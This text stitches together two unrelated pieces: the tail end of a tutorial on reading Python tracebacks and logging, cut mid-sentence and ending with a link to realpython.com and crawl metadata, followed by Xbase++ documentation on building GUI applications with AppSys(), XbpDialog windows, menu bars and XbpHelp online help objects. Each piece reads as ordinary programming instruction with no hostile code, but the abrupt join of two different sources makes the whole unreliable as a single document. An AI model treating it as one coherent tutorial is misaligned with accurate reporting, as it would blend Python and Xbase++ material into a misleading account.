stderr). This looks like we haven’t suppressed the traceback output at all. However, if you call it again while redirecting the
stderr, you can see that the logging system is working, and we can save our logs off for later:
$ python urlcaller.py 2> my-logs.log -1 Connection Error
Conclusion
The Python traceback contains great information that can help you find what is going wrong in your Python code. These tracebacks can look a little intimidating, but once you break it down to see what it’s trying to show you, they can be super helpful. Going through a few tracebacks line by line will give you a better understanding of the information they contain and help you get the most out of them.
Getting a Python traceback output when you run your code is an opportunity to improve your code. It’s one way Python tries to help you out.
Now that you know how to read a Python traceback, you can benefit from learning more about some tools and techniques for diagnosing the problems that your traceback output is telling you about. Python’s built-in
traceback module can be used to work with and inspect tracebacks. The
traceback module can be helpful when you need to get more out of the traceback output. It would also be helpful to learn more about some techniques for debugging your Python code.
Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: Getting the Most Out of a Python Traceback
|
https://realpython.com/python-traceback/
|
CC-MAIN-2021-25
|
refinedweb
| 4,516
| 61.46
|
OPEN it…
Troubleshooting OpenStack Compute services can be a complex issue, but working through problems methodically and logically will help you reach a satisfactory outcome. Carry out the following suggested steps when encountering the different problems presented.
Steps for when you cannot ping or SSH to an instance
- While launching instances, we specify a SECURITY GROUP. If none is specified, a security group is named default.. Use the following command for the same:
sysctl -A | grep ip_forward
- ipv4.ip_forward should be set to 1. If it isn’t, check that /etc/sysctl.conf has the following option uncommented. Use the following command for it:
net.ipv4.ip_forward=1
- Then, run the following command to pick up the change:
sudo sysctl -p
- Other network issues could be routing issues. Check that we can communicate with the OpenStack Compute nodes from our client and that any routing to get to these instances has the correct entries.
- We may have a conflict
- If using OpenStack NEUTRON, check the status of the neutron services on the host and the correct IP namespace is being used (see TROUBLESHOOTING OPENSTACK NETWORKING).
- Reboot your host.
Methods for viewing the Instance Console log
- When using the command line, issue the following commands:
nova list
nova console-log INSTANCE_ID
For example:
nova console-log ee0cb5ca-281f-43e9-bb40-42ffddcb09cd
- When using Horizon, carry out the following steps:
- Navigate to the list of instance and select an instance.
- You will be taken to an Overview. Along the top of the Overview screen is a Log tab. This is the console log for the instance.
.png)
- When viewing the logs directly on a nova-compute host, look for the following file:
The console logs are owned by root, so only an administrator can do this. They are placed at: var/lib/nova/instances/<<
If you are not using Neutron, ensure the following:
- nova-api is running on the Controller host (in a multi_host environment, ensure there’s a nova-api-metadata and a nova-network package installed and running on the Compute host).
- Perform the following iptables check on the Compute node:
sudo iptables -L -n -t nat
We should see a line in the output like in the following screenshot:
- If not, restart your nova-network services and check again.
- Sometimes there are multiple copies of dnsmasq running, which can cause this issue. Ensure that there is only one instance of dnsmasq running:
ps -ef | grep dnsmasq conflicting processes.
If you are using Neutron:
The first place to look is in the /var/log/quantum/metadata_agent.log on the Network host. Here you may see Python stack traces that could indicate a service isn’t running correctly. A connection refused message may appear here suggesting the metadata agent running on the Network host is unable to talk to the Metadata service on the Controller host via the Metadata Proxy service (also running on the Network host).
The metadata service runs on port 8775 on our Controller host, so checking that in running involves checking that the port is open and it’s running the metadata service. To do this on the Controller host, run the following:
sudo netstat -antp | grep 8775
This will bring back the following output if everything is OK:
If nothing is returned, check that the nova-api service is running and if not, start it.
Instance launches; stuck at Building errors
A common error that is usually present is usually related to AMQP being unreachable. Generally, these errors can be ignored unless, that is, you check the time stamp and these errors are currently appearing. You tend to see a number of these messages related to when the services first started up, so look at the timestamp before reaching conclusions.
This command brings back any log line with the ERROR as log level, but you will need to view the logs in more detail to get a clearer picture.
A key log file, when troubleshooting instances that are not booting properly, will be available on the controller host at /var/log/nova/nova-scheduler.log. This file tends to produce the reason why an instance is stuck in Building state. Another file to view further information will be on the compute host at /var/log/nova/nova-compute.log. Look here at the time you launch the instance. In a busy environment, you will want to tail the log file and parse for the instance ID.
Check /var/log/nova/nova-network.log (for Nova Network) and /var/log/quantum/*.log (for Neutron), for any reason why instances aren’t being assigned IP addresses. It could be issues around DHCP preventing address allocation or quotas being reached.
Error codes such as 401, 403, 500
The majority of the OpenStack services are web services, meaning the responses from the services are well defined.
40X: This refers to a service that is up,but responding to an event that is produced by some user error. For example, a 401 is, an authentication failure, so check the credentials used when accessing the service.
500: These. See the Getting help from the community recipe at the end of this topic, for more information.
Listing all instances across all hosts
From the OpenStack controller node, you can execute the following command to get a list of the running instances in the environment:
sudo nova-manage vm list
To view all instances across all tenants, as a user with an admin role executes the following command:
nova list --all-tenants
These commands.
|
https://mindmajix.com/openstack/troubleshooting-openstack-compute-services
|
CC-MAIN-2021-04
|
refinedweb
| 920
| 60.35
|
Quiz: FOPDT Graphical Fit
Learn: First-Order Linear Dynamics with Dead Time using Graphical Fitting Methods
1. One time constant is the amount of time to get to `1-e^{-1}=0.632` or 63.2% of the way to steady state from 0 to 1. It comes from the analytic solution of the first order differential equation `\tau \frac{dy}{dt} + y = u` with `u=1`.
$$y(t)=\left( 1 - e^{-t / \tau} \right)$$
What is the value of `y(t)` at two time constants `t=2\tau`?
- Incorrect. This is the value of `y(t)` at one time constant where `y(3\tau)=( 1 - e^{-1})=0.632`.
- Incorrect. This is the value of `y(t)` at three time constants where `y(3\tau)=( 1 - e^{-3})=0.95`.
- Correct. This is the value of `y(t)` at two time constants where `y(2\tau)=( 1 - e^{-2})=0.86`.
- Incorrect. This is the value of `y(t)` at five time constants where `y(5\tau)=( 1 - e^{-5})=0.993`.
Use this information to answer questions 2-4. A first-order linear system with time delay is a common empirical description of many stable dynamic processes.}$$
2. Determine the value of `K_p` that best fits the step response data.
- Correct. The gain is `K_p = \frac{\Delta y}{\Delta u} = \frac{8}{-2} = -4`.
- Incorrect. This answer is the change `\Delta y=8`. The gain is `K_p = \frac{\Delta y}{\Delta u}`. Don't forget to divide by the input step `\Delta u=-2`
- Incorrect. The gain is negative because a decrease in the input leads to an increase in the response. An increase in the input will likewise lead to a decrease in the response.
- Incorrect. You may be confusing gain with time delay.
3. Determine the value of `\theta_p` that best fits the step response data.
- Incorrect. The input step starts at 1 sec, not 0 sec. The time delay is the difference between the time when the output response starts to respond and the input step time.
- Correct. The time delay `\theta_p=2-1=1` is the difference between the time when the output response starts to respond (t=2) and the input step time (t=1).
- Incorrect. The time delay is always `\ge 0`.
- Incorrect. Time units are important. The plot is in seconds.
4. Determine the value of `\tau_p` that best fits the step response data.
- Incorrect. You may be confusing time constant `\tau_p` with time delay `\theta_p`.
- Incorrect. The time constant is always `\ge 0`.
- Incorrect. The time to reach 63.2% of the response does not include the time delay. Shift to account for the time delay before calculating the time constant.
- Correct. You can check the step response with the Python code below.
You can test your FOPDT parameters with the Python script. Update the values of Km, taum, and thetam and run the program.
Km = 2.0
taum = 2.0
thetam = 2.0
import matplotlib.pyplot as plt
from scipy.integrate import odeint
from scipy.interpolate import interp1d
#:
um = 0
# calculate derivative
dydt = (-y + Km * um)/taum
return dydt
# specify number of steps
ns = 150
# define time points
t = np.linspace(0,15,ns+1)
delta_t = t[1]-t[0]
# define input vector
u = np.zeros(ns+1)
u[10:] = -2.0
# create linear interpolation of the u data versus time
uf = interp1d(t,u)
# simulate FOPDT model with x=[Km,taum,thetam]
def sim_model(Km,taum,thetam):
# input arguments
#Km
#taum
#thetam
# storage for model values
ym = np.zeros(ns+1) # model
# initial condition
ym[0] = 0
# loop through time steps
for i in range(1,ns+1):
ts = [delta_t*(i-1),delta_t*i]
y1 = odeint(fopdt,ym[i-1],ts,args=(uf,Km,taum,thetam))
ym[i] = y1[-1]
return ym
# calculate model with updated parameters
Km = 2.0
taum = 2.0
thetam = 2.0
ym = sim_model(Km,taum,thetam)
# plot results
plt.figure()
plt.subplot(2,1,1)
plt.plot(t,u,'b-',linewidth=2)
plt.legend(['u'],loc='best')
plt.ylabel('Input Step (u)')
plt.grid()
plt.subplot(2,1,2)
plt.plot(t,ym,'k--',linewidth=2,label='y')
plt.ylabel('Output Response (y)')
plt.legend(loc='best')
plt.xlabel('Time (sec)')
plt.grid()
plt.show()
|
http://apmonitor.com/pdc/index.php/Main/QuizFirstOrderGraphical
|
CC-MAIN-2022-40
|
refinedweb
| 712
| 68.97
|
BugTraq
Back to list
|
Post reply
buffer overrun in zlib 1.1.4
Feb 22 2003 12:05AM
Richard Kettlewell (rjk greenend org uk)
(2 replies)
zlib contains a function called gzprintf(). This is similar in
behaviour to fprintf() except that by default, this function will
smash the stack if called with arguments that expand to more than
Z_PRINTF_BUFSIZE (=4096 by default) bytes.
There is an internal #define (HAS_vsnprintf) that causes it to use
vsnprintf() instead of vsprintf(), but this is not enabled by default,
not tested for by the configure script, and not documented.
Even if it was documented, tested for, or whatever, it is unclear what
platforms without vsnprintf() are supposed to do. Put up with the
security hole, perhaps.
Finally, with HAS_vsnprintf defined, long strings will be silently
truncated (and this isn't documented anywhere). Unexpected truncation
of strings can have security implications too; I seem to recall that a
popular MTA had trouble with over-long HELO strings for instance.
I contacted zlib (at) gzip (dot) org [email concealed], and they say they're happy for me to post
about this.
ttfn/rjk
$ cat crashzlib.c
#include <zlib.h>
#include <errno.h>
#include <stdio.h>
int main(void) {
gzFile f;
int ret;
if(!(f = gzopen("/dev/null", "w"))) {
perror("/dev/null");
exit(1);
}
ret = gzprintf(f, "%10240s", "");
printf("gzprintf -> %d\n", ret);
ret = gzclose(f);
printf("gzclose -> %d [%d]\n", ret, errno);
exit(0);
}
$ gcc -g -o crashzlib crashzlib.c -lz
$ ./crashzlib
Segmentation fault (core dumped)
$
$ dpkg -l zlib\* | grep ^i
ii zlib1g 1.1.4-1 compression library - runtime
ii zlib1g-dev 1.1.4-1 compression library - development
$ gdb crashzlib core
GNU gdb 2002-04-01-cvs"...
Core was generated by ` '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libz.so.1...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x400944b2 in _IO_default_xsputn () from /lib/libc.so.6
(gdb) bt
#0 0x400944b2 in _IO_default_xsputn () from /lib/libc.so.6
#1 0x4008b52a in _IO_padn () from /lib/libc.so.6
#2 0x40075128 in vfprintf () from /lib/libc.so.6
#3 0x4008c0c3 in vsprintf () from /lib/libc.so.6
#4 0x4001c923 in gzprintf () from /usr/lib/libz.so.1
#5 0x20202020 in ?? ()
Cannot access memory at address 0x20202020
(gdb) $
[ reply ]
Re: buffer overrun in zlib 1.1.4
Feb 24 2003 06:36PM
Thamer Al-Harbash (tmh whitefang com)
Re: buffer overrun in zlib 1.1.4
Feb 24 2003 12:25PM
Carlo Marcelo Arenas Belon (carenas chasqui lared net pe)
Privacy Statement
|
http://www.securityfocus.com/archive/1/312869/30/0/threaded
|
CC-MAIN-2017-43
|
refinedweb
| 454
| 61.12
|
Runs a Mach message server to handle a Mach RPC request for MIG servers. More...
#include "util/mach/mach_message_server.h"
Runs a Mach message server to handle a Mach RPC request for MIG servers.
The principal entry point to this interface is the static Run() method.
Determines how to handle the reception of messages larger than the size of the buffer allocated to store them.
Runs a Mach message server to handle a Mach RPC request for MIG servers.
This function listens for a request message and passes it to a callback interface. A reponse is collected from that interface, and is sent back as a reply.
This function is similar to
mach_msg_server() and
mach_msg_server_once().
MACH_MSG_SUCCESS(when persistent is kOneShot) or
MACH_RCV_TIMED_OUT(when persistent is kOneShot and timeout_ms is not kMachMessageTimeoutWaitIndefinitely). This function has no successful return value when persistent is kPersistent and timeout_ms is kMachMessageTimeoutWaitIndefinitely. On failure, returns a value identifying the nature of the error. A request received with a reply port that is (or becomes) a dead name before the reply is sent will result in
MACH_SEND_INVALID_DESTas a return value, which may or may not be considered an error from the caller’s perspective.
|
https://crashpad.chromium.org/doxygen/classcrashpad_1_1MachMessageServer.html
|
CC-MAIN-2019-13
|
refinedweb
| 197
| 55.34
|
Hide Forgot
Document URL:
Section Number and Name:
GitHub Webhooks and Generic Webhooks
Describe the issue:
Two issues here:
1. The examples show http and need to be https
2. No where in the instructions does is say the HTTP method needs to be POST in order to be accepted.
Suggestions for improvement:
Correct and add blurb on what type of HTTP verb is required.
Additional information:
Upstream Issue:
Example using curl:
curl -X POST https://<openshift_api_host:port>/oapi/v1/namespaces/<namespace>/buildconfigs/<name>/webhooks/<secret>/generic
The information about the POST verb was added in 3.3:
Here's the relevant section:.
1) I think this is sufficient to cover the POST verb. Do you agree? (If so, I'll backport the example.)
2) Is using "https" in the command sufficient, or do all instances of the webhook need to be presented as HTTPS instead of HTTP?
Lets close this, was added in the later docs.
|
https://partner-bugzilla.redhat.com/show_bug.cgi?id=1366792
|
CC-MAIN-2020-29
|
refinedweb
| 157
| 66.74
|
/>
There are many sorting algorithms, often with variations and optimizations, and every now and again I will be coding some of them for this site.
A while ago I wrote a post on bubble sort and here is a follow up on another sorting algorithm called selection sort. As with bubble sort it's not particularly efficient but it is simple to understand and implement.
The basic
The list being sorted can be regarded as being in two parts, the sorted part on the left which gets ever larger and the unsorted part on the right which gets ever smaller. We stop before getting to the last item because if all other items are in their correct place the last item will automatically be in the right place.
Create a new folder and within it create an empty file called selectionsort.py. Open it in your editor and enter the following code, or you can download it as a zip or clone/download the Github repo if you prefer. As it's a short program I have included all the code in one hit.
Source Code Links
selectionsort.py
import random RED = "\x1B[31m" GREEN = "\x1B[32m" RESET = "\x1B[0m" def main(): """ Here we just demonstrate selection sort by calling a couple of functions to create a list of random data and sort it. """ print("------------------") print("| codedrome.com |") print("| Selection Sort |") print("------------------\n") data = populate_data() selection_sort(data) def populate_data(): """ Create an empty list and add a few random integers to it. """ data = [] for i in range(0, 16): data.append(random.randint(1, 99)) return data def print_data(data, sortedto): """ Prints the data on a single line, with the sorted portion in green and the unsorted portion in red, using ANSI terminal codes. """ for i in range(0, len(data)): if i < sortedto: print(GREEN + "%-3d " % data[i] + RESET, end="") else: print(RED + "%-3d " % data[i] + RESET, end="") print("\n") def selection_sort(data): """ Applies the selection sort algorithm to a list of integers, also printing the data on each iteration to show progress. """ print("Unsorted...") print_data(data, 0) print("Selection Sorting...") sorted_to = 0; while(sorted_to < len(data) - 1): index_of_lowest = find_lowest_index(data, sorted_to) swap(data, sorted_to, index_of_lowest) sorted_to += 1 print_data(data, sorted_to) print("Sorted!") def swap(data, i1, i2): """ A neat little trick to swap integer values without using a third variable """ if i1 != i2: data[i1] = data[i1] ^ data[i2] data[i2] = data[i1] ^ data[i2] data[i1] = data[i1] ^ data[i2] def find_lowest_index(data, start): """ Finds the index of the lowest item in the unsorted part of the data. """ lowest_index = start for i in range(start, len(data)): if data[i] < data[lowest_index]: lowest_index = i return lowest_index main()
At the top we have three variables which hold ANSI codes for setting terminal colours. I'll cover this topic in a later post but for now just print these strings to change the text colour or reset it to the default.
I'll gloss over main which basically calls other functions to create a list of random numbers and then sort them.
The populate_data function is very simple - it just sets the elements of the supplied list to random values.
The print_data function is also simple in that it iterates the supplied array and prints it out, but it also takes a sortedto argument. This deliniates the sorted/unsorted parts of the list and is used to print the sorted numbers in green and the unsorted numbers in red.
We now get to the selection_sort function itself, which starts off by calling print_data to display the unsorted list. We then declare the variable sorted_to which is the index of the end of the currently sorted part of the list, obviously initialized to 0.
We then enter a loop which calls a function to find the index of the lowest item in the unsorted part of the list, and then calls another function to swap it with the first item in the unsorted part. We then increment sorted_to and print the list. Printing the list on every iteration gives a visual indication of how the algorithm does its stuff.
Now let's look at the two functions used by selection_sort. The first is swap, which takes a list and two indexes, and swaps the items at these positions. As we are only swapping integers we can use exclusive or, or ^ in Python. I won't describe how this works here as it was described in the post on bubble sort which you might like to refer to.
The last function is find_lowest_index. This simply iterates the unsorted part of the list to find the lowest item, the index of which it returns.
We can now run the program with this command in the terminal . . .
Running the program
python3.7 selectionsort.py
. . . which gives us this output:
Program Output
------------------ | codedrome.com | | Selection Sort | ------------------ Unsorted... 3 39 39 95 99 86 78 10 38 16 75 16 13 11 18 43 Selection Sorting... 3 39 39 95 99 86 78 10 38 16 75 16 13 11 18 43 3 10 39 95 99 86 78 39 38 16 75 16 13 11 18 43 3 10 11 95 99 86 78 39 38 16 75 16 13 39 18 43 3 10 11 13 99 86 78 39 38 16 75 16 95 39 18 43 3 10 11 13 16 86 78 39 38 99 75 16 95 39 18 43 3 10 11 13 16 16 78 39 38 99 75 86 95 39 18 43 3 10 11 13 16 16 18 39 38 99 75 86 95 39 78 43 3 10 11 13 16 16 18 38 39 99 75 86 95 39 78 43 3 10 11 13 16 16 18 38 39 99 75 86 95 39 78 43 3 10 11 13 16 16 18 38 39 39 75 86 95 99 78 43 3 10 11 13 16 16 18 38 39 39 43 86 95 99 78 75 3 10 11 13 16 16 18 38 39 39 43 75 95 99 78 86 3 10 11 13 16 16 18 38 39 39 43 75 78 99 95 86 3 10 11 13 16 16 18 38 39 39 43 75 78 86 95 99 3 10 11 13 16 16 18 38 39 39 43 75 78 86 95 99 Sorted!
You can clearly see the sorted part of the list getting larger and the unsorted part getting smaller. As I mentioned above we can stop before we get to the last item which is bound to be in the correct place if all the other items are.
|
https://www.codedrome.com/selection-sort-in-python/
|
CC-MAIN-2021-31
|
refinedweb
| 1,118
| 63.93
|
Sadly there hasn’t been much love shown to Data Quality Services (DQS) in the last few releases of SQL Server, and I don’t think there will be in the coming SQL Server vNext release.
Month: January 2017
Quote of the week
Sometimes developing a solution from the clients database(s) is like putting together a jigsaw, which is picture side down, while in a pitch black room, wearing a blindfold and boxing gloves.
I want to dislike something!
Social.
MDX and Sum columns
SSIS – XML, Foreach Loop and sub folders
Network
12345678.csv
Space
12345678.csv
Sessions
12345678.csv
No, sadly the ‘Traverse sub folder doesn’t work like that. Nuts, so after a quick search I found this link at Joost van Rossum’s blog that uses a bit of C# to get the folder list and generate an XML schema with the folder list in it. You can then use the ‘Foreach NodeList Enumerator’ in the Foreach Loop to get the files.
Well sort of, the code on that website only gets the folder structure, not the full path of the file. It was however a good starting point, and looked like it could be adapted to get the full file list, that could be passed on to the data flow logic in the Foreach Container. Now I’m TSQL through and through, my C# is poor, but slowly getting better, however I did mange to hack the code so it got the file list. So here it is, please use, improve and share.
#region Namespaces
using System;
using System.Data;
using System.IO;
using System.Xml;
using Microsoft.SqlServer.Dts.Runtime;
using System.Windows.Forms;
using System.Collections.Generic;
#endregion
namespace ST_b87894259c434eeca3da339009a06fdf
{
///
/// ScriptMain is the entry point class of the script. Do not change the name, attributes,
/// or parent of this class.
///
// Use this for SQL Server 2012 and above
[Microsoft.SqlServer.Dts.Tasks.ScriptTask.SSISScriptTaskEntryPointAttribute]
// Use the below for SQL Server 2008, comment out the above
//
// Variables for the xml string
private XmlDocument xmldoc;
private XmlElement xmlRootElem;
public void Main()
{
// Inialize XMLdoc
xmldoc = new XmlDocument();
// Add the root element:
xmlRootElem = xmldoc.CreateElement("", "ROOT", "");
// Add Subfolders as Child elements to the root element
GetSubFolders(Dts.Variables["User::FeedsFilePath"].Value.ToString());
// Add root element to XMLdoc
xmldoc.AppendChild(xmlRootElem);
// Fill SSIS variable with XMLdoc
Dts.Variables["xmldoc"].Value = xmldoc.InnerXml.ToString();
Dts.TaskResult = (int)ScriptResults.Success;
}
// Recursive method that loops through subfolders
private void GetSubFolders(String parentFolder)
{
// Get subfolders of the parent folder
string[] subFolders = Directory.GetDirectories(parentFolder);
var allfiles = DirSearch(parentFolder);
foreach (var filePath in allfiles)
{
XmlElement xmlChildElem;
XmlText xmltext;
// var directoryInfo = new DirectoryInfo(Path.GetDirectoryName(filePath));
// Create child element "Folder":
// d:\foreachfoldertest\subfolder1\
xmlChildElem = xmldoc.CreateElement("", "File", "");
xmltext = xmldoc.CreateTextNode(filePath);
xmlChildElem.AppendChild(xmltext);
// Add child element to root element
xmlRootElem.AppendChild(xmlChildElem);
}
}
// This bit gets the file list and adds it to the subfolders
private List DirSearch(string sDir)
{
List files = new List();
foreach (string f in Directory.GetFiles(sDir))
{
files.Add(f);
}
foreach (string d in Directory.GetDirectories(sDir))
{
files.AddRange(DirSearch(d));
}
return files;
}
}
}
E:\SomeFolder\Space\12345678.csv
D:\SomeFolder\Sessions\12345678.csv
(1) – The C# script is run to feed the Foreach container
Deploying SSIS Packages SQL Server 2008
for %I in (*.dtsx) do
Long live the PC
which has led to PC’s with TV tuners and TV’s with internet access. A couple of things stopped ‘Convergence’, lack of connection standards and agreement between companies. Content was restricted as media creators and distributors refused to release items in different formats to keep costs down, also wanting to supply their content through their own portals. This is changing now with Hulu, Netflix and iTunes providing easy accessible portals across a wide range of devices.
Crime and weather a curious insight
I.
What is Big Data?
2) I can’t believe you said that
3) Don’t mention that bit of gossip about you know what to you know who
4) You mentioned that bit of gossip about you know what to you know who
The other guy was working for a marketing company and was seeing Big Data in terms of social media, and aggregations from a wide variety of websites and un-structured data.
The third was a business analyst and was talking to about Big Data in term of analytics on the volume or types of data.
But the other issue of Big Data is the mix of the types of data, you can have structured and unstructured data in the mix. Most business have structured data that tells them that they sold a product to this customer at this point in time and shipped it at this date. It’s the unstructured data that is the issue for a number of businesses. What is unstructured data? Well it is quite a mix of types, photos, social media posts, documents and other random data that is not normally time and space specific.
I told the other two about it, once again proving that the MD should approve my request to change my job title from ‘Senior Consultant’ to ‘Data visionary and information guru who pushes back the boundaries of ignorance’, the glow of being awesome stopped only when I got in the car with my wife on the drive back home!
Warning Business Intelligence
Ten.
|
https://jlsql.blog/2017/01/
|
CC-MAIN-2021-17
|
refinedweb
| 889
| 55.03
|
Search the Community
Showing results for tags 'memory leak'.
Memory optimize
fvchapa posted a topic in GSAPhow is a best way to generate animate and kill then for memory optimize? im include tweenmax ang generate animation but is continued trigger and jsheap increase all time. see screen capture
Weird Memory Leak using ImageLoader
Williemaster posted a topic in Loading (Flash)First of all let me thank you for your awesome loading features, what i mostly liked about them is that you can define loaders in an XML file, great job. Now to the important part. I just found out about Adobe Scout and decided to give it a try to tune my App and I found something quite weird that nearly doubled my memory use. The problem is that when i tried to decompress a loaded bitmapData with the getPixel(0,0) technique, two things used memory, Bitmap DisplayObjects and BitmapData, both used 20.480 KB. Why Bitmap DisplayObjects used memory? I thought that only BitmapData should have used memory, the Bitmap DisplayObjects was later garbage collected, but why is it being created in the first place.... So i tried using getPixel(0,0) on a clone of the bitmapData i loaded and Bitmap DisplayObjects never appeared. Is the Bitmap DisplayObjects memory being used by the ContentDisplay object that comes with the loader? If so, what can i do to prevent this from happening?!
-.?
onCompleteParams memory management
difix posted a topic in GSAP (Flash)this a testing class i did cause of have some memory issues on much, much more complicated situation i am currently in and tried this to test my memory leaks and seems MyClass instance doesnt clear it self, but tweenlite, tw is clearing from memory fine. I am just wondering if I am missing anything. I didnt even have to add any thing to stage or do any to find that instance isnt clearing when its called null. and MyClass is an empty class. public class ui extends MovieClip { private var tw:TweenLite; private var instance:MyClass; public function ui() { super(); instance = new MyClass(); tw = TweenLite.to(instance, 1, {x:10, onComplete:clearmem, onCompleteParams:[instance]}); } private function clearmem(obj:MyClass):void { if (tw != null) { tw.kill(); tw = null; } TweenLite.killTweensOf(obj); instance = null; } } I am using version 12
|
https://staging.greensock.com/tags/memory%20leak/
|
CC-MAIN-2022-05
|
refinedweb
| 382
| 61.56
|
Asked by:
Announcing the Refresh of Service Bus EAI & EDI Labs
Announcing the Refresh of Service Bus EAI & EDI Labs
We are happy to announce the refresh of Service Bus EAI & EDI Labs as communicated earlier and on time. We have added a bunch of capabilities and quite a few of it came as asks from this forum.
Few helpful links:
- SDK & Samples :
- Tutorial & documentation :
- Portal to provision namespaces :
- EDI TPM Portal :
Do try out the new capabilities and let us know your feedback.
Cheers,
-Azure Integration Services Team
- Edited by Harish Kumar Agarwal - MSFT Thursday, April 05, 2012 4:54 PM
General discussion
All replies
Nice work. I see lot of improvements around Schema Editor area. It is looking more like Biztalk now. I also like the tracking functionality. I have few initial questions:
1. I don't see ability to generate instance like we can do in Biztalk. In Dec release, the functionality was there
2. From the documentation, it looks it is possible to delete Tracking data using REST API . But, I am not able to delete any data. It gives me 500 error.
Cheers,
Shashi Raina
Hi Sashi ,
Thanks for sharing your feedback . You are correct in your observations .
1. Generate instance for Schema Editor could not make it this refresh . However we are aware of the same and will be adding it as part of the upcoming releases . Meanwhile you can use the use "Generate Sample XML" in the XML Schema Explorer for the mean while . Snapshot below :
2. The delete REST API for the tracking data is not part of this release . The documentation may have a bug and I will look into that . However we have a retention policy of 7 days and so the data will stay around for the same . The delete API is likely to come up as part of the upcoming releases however I wish to understand something first . After the retention policy period is over say in a production scenario then the data older than the retention period will automatically be cleared . What is your purpose of having the delete functionality directly and won't the auto clearing of data be enough ?
Continue to share the feedback .
- Harish Kumar Agarwal
- Edited by Harish Kumar Agarwal - MSFT Monday, April 09, 2012 6:12 PM
Shashi ,
What instances are you refrring to here ? If its the service instance you are referring to to then that is automatically taken care of . If in case one of the service instances goes down then Azure will auto detect it and then bring it or another instance up .
|
https://social.msdn.microsoft.com/Forums/en-US/3fb725e5-8415-4ba7-a51c-9bd00a5798a8/announcing-the-refresh-of-service-bus-eai-edi-labs?forum=azurebiztalksvcs
|
CC-MAIN-2015-18
|
refinedweb
| 434
| 64.91
|
Creating GUI applications Foundation
This section shows how to design and program GUI applications. It serves both as a guide for programmers new to a graphic user interface and as a source of solutions to some of the problems that may arise when programming GUI applications. Most of the example programs discussed in this section are also provided in the Xbase++ installation. Tips are included for organizing GUI applications and the answers to questions such as "How is this programmed?" and "Where is this implemented?" are discussed.
The main task of the AppSys() function is to create the application window. Since AppSys() is an implicit INIT PROCEDURE, it is always called prior to the Main procedure. The application window object created in AppSys() depends on the type of application. It could be an XbpCrt window or an XbpDialog window. In order to ensure the widest possible compatibility, the default AppSys() routine included in Xbase++ creates an XbpCrt window. When developing new GUI applications using Xbase++, AppSys() should generally be changed to create an XbpDialog window instead. Additional tasks that must be performed only once at application startup can also be included in this procedure. This often includes creating the menu system, providing a help routine and initializing system wide variables or other necessary resources. These tasks can be accomplished before the application window is even visible, which allows the essential parts of the application to already be available when the Main procedure is called.
The first decision in implementing AppSys() is whether to use XbpCrt or XbpDialog windows. In the case of a GUI application, the application type must also be considered. The concept "application type" designates the kind of user interface that the application will provide. The simpler case is an SDI application (Single Document Interface) where the application consists of a single window. The alternative is an MDI application (Multiple Document Interface). An MDI application runs in multiple windows and AppSys() just creates the main window allowing the additional windows within the main window to be generated later in the program. The size of the application window generally depends on the application type. The application window of an SDI application can be smaller than that of an MDI application, since no additional windows are needed in an SDI application. Also, the window size of an SDI application can be fixed, not allowing the user to change the size. The size of the application window of an MDI application must be changeable by the user.
The following example is the AppSys() procedure from the file SDIDEMO.PRG that presents a complete example of an SDI application. The various tasks performed by AppSys() are demonstrated in the following procedure:
PROCEDURE AppSys
LOCAL oDlg, oXbp, aPos[2], aSize, nHeight:=400, nWidth := 615
// Get size of desktop window
// to center the application window
aSize := SetAppWindow():currentSize()
aPos[1] := Int( (aSize[1]-nWidth ) / 2 )
aPos[2] := Int( (aSize[2]-nHeight) / 2 )
// Create application window
oDlg := XbpDialog():new()
oDlg:title := "Toys & Fun Inc. [Xbase++ - SDI Demo]"
oDlg:border:= XBPDLG_THINBORDER
oDlg:create( ,, aPos, {nWidth, nHeight},, .F. )
// Set background color for drawing area
oDlg:drawingArea:SetColorBG( GRA_CLR_PALEGRAY )
// Select font
oDlg:drawingArea:SetFontCompoundName( "8.Help.normal" )
// Create menu system (UDF)
MenuCreate( oDlg:menuBar() )
// Provide online help via UDF
oXbp := XbpHelpLabel():new():create()
oXbp:helpObject := ;
HelpObject( "SDIDEMO.HLP", "Help for SDI demo" )
oDlg:helpLink := oXbp
// Display application window and set focus to it
oDlg:show()
SetAppWindow( oDlg )
SetAppFocus ( oDlg )
RETURN
In this example, a dialog window is created with the size 615 x 400 pixels. This size allows it to be completely displayed even on a low resolution screen. The window is provided for an SDI application and has a fixed size (XBPDLG_THINBORDER). The first call to SetAppWindow() provides a reference to the desktop on which the application window is displayed. The :currentSize() method of this object provides the size of the desktop window corresponding to the current screen resolution. This information is used to position the application window when the Xbase++ application is called. In the example, the application window is displayed centered on the screen.
After the background color for the drawing area of the dialog window is set, the menu system is generated in the function MenuCreate(). This user-defined function (UDF) receives the return value of the method :menuBar() as an argument. The :menuBar() method creates an XbpMenuBar object and installs it in the application window. The menu system must then be constructed in the UDF. This approach is recommended because the menu system construction can be performed before the application window is visible. The mechanics of constructing a menu system is described in the next section.
In this AppSys() example, the mechanism for the online help is implemented after the menu system is created in MenuCreate(). This includes the generation of an XbpHelpLabel object that is assigned to the instance variable :helpLink. The help label object references help information and activates the window of the online help. The online help window is in turn managed by an XbpHelp object which must be provided to the XbpHelpLabel object. This is done by assigning an XbpHelp object to the :helpObject instance variable of the XbpHelpLabel object. The XbpHelp object manages online help windows and should exist only once within an Xbase++ application. For this reason it is created in the user-defined function HelpObject() which is shown below:
********************************************************************
* Routine to retrieve the help object. It manages the online help
********************************************************************
FUNCTION HelpObject( cHelpFile, cTitle )
STATIC soHelp
IF soHelp == NIL
soHelp := XbpHelp():new()
soHelp:resGeneralHelp := IPFID_HELP_GENERAL
soHelp:resKeysHelp := IPFID_HELP_KEYS
soHelp:create( SetAppWindow(), cHelpFile, cTitle )
ENDIF
RETURN soHelp
An XbpHelp object is created and stored in a STATIC variable the first time this function is called. The XbpHelp object manages the online help window of an Xbase++ application and a reference to it can be retrieved by calling the function HelpObject() at any point in the program. This allows any number of XbpHelpLabel objects to be created that always activate the same XbpHelp object (or the same online help).
The function HelpObject() needs to receive the file name for the HLP file and the window title for the online help. Otherwise this function is generic. It also uses two #define constants which reference the two help windows available in each application. These constants can only be user-defined and must be used in the source code of the online help as numeric IDs in order to reference the specific help window.
